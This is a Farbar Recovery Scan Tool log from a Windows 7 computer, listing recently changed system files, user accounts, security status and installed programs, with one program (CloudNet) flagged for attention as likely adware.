2020-01-15 21:37 - 2019-12-17 01:36 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2020-01-15 21:37 - 2019-12-17 01:36 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2020-01-15 21:37 - 2019-12-17 01:36 - 000047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2020-01-15 21:37 - 2019-12-17 01:35 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2020-01-15 21:37 - 2019-12-17 01:35 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2020-01-15 21:37 - 2019-12-17 01:35 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2020-01-15 21:37 - 2019-12-17 01:33 - 002304000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2020-01-15 21:37 - 2019-12-17 01:32 - 000199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2020-01-15 21:37 - 2019-12-17 01:31 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2020-01-15 21:37 - 2019-12-17 01:30 - 000047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2020-01-15 21:37 - 2019-12-17 01:30 - 000030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2020-01-15 21:37 - 2019-12-17 01:29 - 000315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2020-01-15 21:37 - 2019-12-17 01:28 - 000476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000662528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2020-01-15 21:37 - 2019-12-17 01:27 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2020-01-15 21:37 - 2019-12-17 01:26 - 000620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2020-01-15 21:37 - 2019-12-17 01:18 - 000416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2020-01-15 21:37 - 2019-12-17 01:18 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2020-01-15 21:37 - 2019-12-17 01:16 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2020-01-15 21:37 - 2019-12-17 01:16 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2020-01-15 21:37 - 2019-12-17 01:14 - 015445504 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2020-01-15 21:37 - 2019-12-17 01:14 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2020-01-15 21:37 - 2019-12-17 01:14 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2020-01-15 21:37 - 2019-12-17 01:14 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2020-01-15 21:37 - 2019-12-17 01:14 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2020-01-15 21:37 - 2019-12-17 01:13 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2020-01-15 21:37 - 2019-12-17 01:11 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2020-01-15 21:37 - 2019-12-17 01:10 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2020-01-15 21:37 - 2019-12-17 01:09 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2020-01-15 21:37 - 2019-12-17 01:08 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2020-01-15 21:37 - 2019-12-17 01:04 - 004859392 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-01-15 21:37 - 2019-12-17 01:03 - 004112384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2020-01-15 21:37 - 2019-12-17 01:02 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2020-01-15 21:37 - 2019-12-17 01:01 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2020-01-15 21:37 - 2019-12-17 01:01 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2020-01-15 21:37 - 2019-12-17 01:00 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2020-01-15 21:37 - 2019-12-17 00:56 - 013838336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-01-15 21:37 - 2019-12-17 00:52 - 001566720 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2020-01-15 21:37 - 2019-12-17 00:43 - 004387840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-01-15 21:37 - 2019-12-17 00:41 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2020-01-15 21:37 - 2019-12-17 00:39 - 001331712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2020-01-15 21:37 - 2019-12-17 00:38 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2020-01-15 21:37 - 2019-12-12 04:35 - 000271872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsmf.dll
2020-01-15 21:37 - 2019-12-12 04:34 - 000253952 _____ (Microsoft) C:\Windows\SysWOW64\DShowRdpFilter.dll
2020-01-15 21:37 - 2019-12-12 04:28 - 000301568 _____ (Microsoft Corporation) C:\Windows\system32\tsmf.dll
2020-01-15 21:37 - 2019-12-12 04:27 - 000284160 _____ (Microsoft) C:\Windows\system32\DShowRdpFilter.dll
2020-01-15 21:37 - 2019-12-10 10:36 - 000375008 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2020-01-15 21:37 - 2019-12-10 09:38 - 001549312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 001400320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 001177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000544768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiaaut.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000328704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shsvcs.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sti.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000197120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssphtb.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000113664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiadss.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000104448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssprxy.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 003165184 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 002319360 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 002222080 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 001484800 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000778240 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000670208 _____ (Microsoft Corporation) C:\Windows\system32\wiaaut.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000583168 _____ (Microsoft Corporation) C:\Windows\system32\wiaservc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000491520 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000486912 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000371712 _____ (Microsoft Corporation) C:\Windows\system32\shsvcs.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000295424 _____ (Microsoft Corporation) C:\Windows\system32\sti.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000191488 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000149504 _____ (Microsoft Corporation) C:\Windows\system32\sti_ci.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\wiadss.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000099840 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\wiarpc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\wiatrace.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2020-01-15 21:37 - 2019-12-10 09:23 - 000573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000428544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000164352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000093184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiatrace.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msshooks.dll
2020-01-15 21:37 - 2019-12-10 09:17 - 006136320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2020-01-15 21:37 - 2019-12-10 09:17 - 002651136 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-01-15 21:37 - 2019-12-10 09:16 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\serscan.sys
2020-01-15 21:37 - 2019-12-10 09:15 - 000594432 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-01-15 21:37 - 2019-12-10 09:15 - 000249856 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2020-01-15 21:37 - 2019-12-10 09:14 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2020-01-15 21:37 - 2019-12-10 09:01 - 003233280 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-01-15 21:37 - 2019-12-10 08:56 - 000754176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2020-01-15 21:37 - 2019-12-10 07:17 - 007084032 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2020-01-13 19:45 - 2020-01-13 19:45 - 000000668 _____ C:\Users\Public\Desktop\A bootable USB.lnk
2020-01-13 19:45 - 2020-01-13 19:45 - 000000668 _____ C:\ProgramData\Desktop\A bootable USB.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-02-07 20:54 - 2019-05-12 10:51 - 000000000 ____D C:\Program Files\SoftEther VPN Client
2020-02-07 20:54 - 2018-01-07 19:36 - 000000000 ____D C:\Users\Jomko\AppData\LocalLow\Mozilla
2020-02-07 20:52 - 2009-07-14 05:45 - 000027360 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-02-07 20:52 - 2009-07-14 05:45 - 000027360 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-02-07 20:51 - 2009-07-14 06:13 - 000006170 _____ C:\Windows\system32\PerfStringBackup.INI
2020-02-07 20:51 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2020-02-07 20:49 - 2018-01-12 17:01 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2020-02-07 20:44 - 2018-01-07 19:33 - 000000000 __SHD C:\Users\Jomko\IntelGraphicsProfiles
2020-02-07 20:44 - 2018-01-07 19:27 - 000000000 ____D C:\ProgramData\NVIDIA
2020-02-07 20:44 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-02-07 20:41 - 2018-02-01 14:17 - 000000000 ____D C:\AdwCleaner
2020-02-06 21:09 - 2018-02-13 09:42 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-02-06 21:09 - 2018-01-07 22:45 - 000003372 _____ C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw
2020-02-06 21:09 - 2018-01-07 22:45 - 000003244 _____ C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie
2020-01-26 22:57 - 2018-01-08 09:18 - 000001024 ____H C:\AMTAG.BIN
2020-01-26 21:01 - 2009-07-14 06:08 - 000032566 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2020-01-26 20:16 - 2018-06-15 20:12 - 000037692 _____ C:\Windows\ntbtlog.txt
2020-01-26 20:13 - 2009-07-14 05:45 - 000012288 _____ C:\Windows\system32\umstartup.etl
2020-01-26 15:18 - 2018-02-15 20:31 - 000000000 ____D C:\Users\Jomko\AppData\Local\CrashDumps
2020-01-24 21:54 - 2018-01-16 15:01 - 000000000 ____D C:\Windows\Minidump
2020-01-24 16:33 - 2018-01-08 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\FileZilla
2020-01-23 00:40 - 2018-01-07 22:46 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-01-23 00:40 - 2018-01-07 22:46 - 000002204 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-01-23 00:40 - 2018-01-07 22:46 - 000002204 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-01-22 23:07 - 2018-01-11 14:10 - 000000000 ____D C:\ProgramData\Package Cache
2020-01-22 23:06 - 2018-01-07 22:53 - 000000000 ____D C:\Portable
2020-01-22 20:07 - 2018-05-28 20:39 - 000000000 ____D C:\Users\Jomko\Documents\Bluetooth Folder
2020-01-22 20:05 - 2009-07-14 03:34 - 000000215 _____ C:\Windows\system.ini
2020-01-22 20:04 - 2009-07-14 03:34 - 095895552 _____ C:\Windows\system32\config\SOFTWARE.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 023920640 _____ C:\Windows\system32\config\SYSTEM.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 001847296 _____ C:\Windows\system32\config\DEFAULT.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 000061440 _____ C:\Windows\system32\config\SAM.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 000028672 _____ C:\Windows\system32\config\SECURITY.bak
2020-01-22 18:06 - 2019-05-01 00:02 - 000000000 ____D C:\Windows\SysWOW64\NV
2020-01-22 18:06 - 2019-05-01 00:02 - 000000000 ____D C:\Windows\system32\NV
2020-01-22 17:10 - 2019-10-20 16:56 - 000000000 ____D C:\Users\Jomko\Desktop\Staré údaje Firefoxu
2020-01-22 15:00 - 2018-01-07 19:36 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-01-22 13:31 - 2018-01-11 23:49 - 000000000 ____D C:\Users\Jomko\AppData\Local\ElevatedDiagnostics
2020-01-22 13:31 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\system32\NDF
2020-01-21 17:06 - 2018-03-14 20:52 - 000004466 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-01-21 17:06 - 2018-02-13 09:42 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-01-21 17:06 - 2018-02-13 09:42 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-01-21 17:06 - 2018-02-13 09:42 - 000004324 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-01-21 17:06 - 2018-02-13 09:42 - 000000000 ____D C:\Windows\system32\Macromed
2020-01-21 11:02 - 2018-01-08 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Local\FileZilla
2020-01-21 11:01 - 2018-01-08 18:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client
2020-01-21 11:01 - 2018-01-08 18:51 - 000000000 ____D C:\Program Files\FileZilla FTP Client
2020-01-20 20:32 - 2019-05-24 18:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-01-20 20:32 - 2019-05-24 18:27 - 000000000 ____D C:\Program Files\Java
2020-01-20 20:31 - 2019-05-24 18:27 - 000129088 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2020-01-18 12:45 - 2018-01-23 15:41 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\XnView
2020-01-17 14:13 - 2018-01-12 21:25 - 000004608 _____ C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-01-16 15:00 - 2018-01-08 09:18 - 000000000 ____D C:\Program Files (x86)\AOMEI Partition Assistant Standard Edition 6.6
2020-01-16 13:58 - 2019-03-29 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Logishrd
2020-01-16 13:58 - 2018-02-21 21:47 - 000000000 ____D C:\Users\Jomko\AppData\Local\Deployment
2020-01-15 23:15 - 2009-07-14 05:45 - 000360416 _____ C:\Windows\system32\FNTCACHE.DAT
2020-01-15 21:45 - 2018-01-07 22:46 - 000000000 ____D C:\Windows\system32\MRT
2020-01-15 21:40 - 2018-01-07 22:46 - 120202352 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2020-01-08 00:08 - 2019-05-24 18:28 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\.minecraft

==================== Files in the root of some directories ========

2018-01-12 20:03 - 2018-01-12 20:03 - 000000437 _____ () C:\Users\Jomko\AppData\Roaming\ImageTuner.ini
2018-01-12 21:25 - 2020-01-17 14:13 - 000004608 _____ () C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-01-10 00:20 - 2018-01-10 00:20 - 000000001 _____ () C:\Users\Jomko\AppData\Local\llftool.4.40.agreement
2019-07-15 23:58 - 2019-07-15 23:58 - 000015468 _____ () C:\Users\Jomko\AppData\Local\recently-used.xbel
2019-07-11 06:58 - 2019-07-11 06:58 - 000012216 _____ () C:\Users\Jomko\AppData\Local\recently-used.xbel.NCNJ4Z
2018-03-22 16:27 - 2019-04-14 22:21 - 000007610 _____ () C:\Users\Jomko\AppData\Local\Resmon.ResmonCfg

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2020-01-18 14:26
==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-02-2020 02
Ran by Jomko (07-02-2020 20:56:59)
Running from C:\Users\Jomko\Desktop
Windows 7 Professional Service Pack 1 (X64) (2018-01-07 16:45:09)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1214245489-2610092731-2950206201-500 - Administrator - Disabled)
Guest (S-1-5-21-1214245489-2610092731-2950206201-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1214245489-2610092731-2950206201-1002 - Limited - Enabled)
Jomko (S-1-5-21-1214245489-2610092731-2950206201-1000 - Administrator - Enabled) => C:\Users\Jomko

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}) (Version: - Microsoft)
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0015-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0016-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0018-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0019-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001A-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001B-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0405-0000-0000000FF1CE}_PROPLUS_{3C3813E1-C370-4F32-9639-8B43C7C780CD}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0407-0000-0000000FF1CE}_PROPLUS_{2AB528A5-BB1B-4EBE-8E51-AD0C4CD33CA9}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0409-0000-0000000FF1CE}_PROPLUS_{3EC77D26-799B-4CD8-914F-C1565E796173}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-040E-0000-0000000FF1CE}_PROPLUS_{685D17E5-D868-4A77-B58E-255DEBA78262}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-041B-0000-0000000FF1CE}_PROPLUS_{F67648A4-713E-4298-BBAD-A83D8283B0F3}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-002A-0000-1000-0000000FF1CE}_PROPLUS_{00C5525B-3CB3-467D-8100-2E6FB306CD86}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-002A-041B-1000-0000000FF1CE}_PROPLUS_{FE295FA2-72FC-4859-85B3-0E6685DB13A4}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0044-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-006E-041B-0000-0000000FF1CE}_PROPLUS_{FE295FA2-72FC-4859-85B3-0E6685DB13A4}) (Version: - Microsoft) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Slovak (HKLM-x32\...\{AC76BA86-7AD7-1051-7B44-AC0F074E4100}) (Version: 19.021.20061 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.321 - Adobe)
Aktualizácie NVIDIA 2.13.0.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.13.0.21 - NVIDIA Corporation)
ANT Drivers Installer x64 (HKLM\...\{C14C3A1D-B5B3-41BB-9358-6FEA3FC642AF}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
AOMEI Partition Assistant Standard Edition 6.6 (HKLM-x32\...\{02F850ED-FD0E-4ED1-BE0B-54981f5BD3D4}_is1) (Version: - AOMEI Technology Co., Ltd.)
Apple Mobile Device Support (HKLM\...\{6CECF0FB-EE71-4FE5-8AE0-FA007408934A}) (Version: 13.0.0.38 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Ashampoo PDF Pro (HKLM-x32\...\{0A11EA01-9906-0D0E-7868-3381FE134510}_is1) (Version: 1.0.7 - Ashampoo GmbH & Co. KG)
Bitvise SSH Client - FlowSshNet (x64) (HKLM\...\{0F4F44AB-C022-466B-9836-8EB4344E481F}) (Version: 8.38.0.0 - Bitvise Limited) Hidden
Bitvise SSH Client - FlowSshNet (x86) (HKLM-x32\...\{F9932D09-05BF-4FB8-B748-094EC2B3FC1F}) (Version: 8.38.0.0 - Bitvise Limited) Hidden
Bitvise SSH Client 8.38 (remove only) (HKLM-x32\...\BvSshClient) (Version: 8.38 - Bitvise Limited)
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.96 - Meno vašej spoločnosti)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CloudNet (HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Elevated Installer (HKLM-x32\...\{B11981DA-5AEA-459F-978A-F99541F77AD5}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
FileZilla Client 3.46.3 (HKLM-x32\...\FileZilla Client) (Version: 3.46.3 - Tim Kosse)
Free FLAC to MP3 Converter 1.4 (HKLM-x32\...\{A54C01BD-1277-4722-B42B-EC9800A90B1E}_is1) (Version: 1.4 - PolySoft Solutions)
Free ZIP Password Recovery (HKLM-x32\...\{AF4ED478-C15D-4D4D-95E4-70C15F963729}) (Version: 3.70.69 - KRyLack Software)
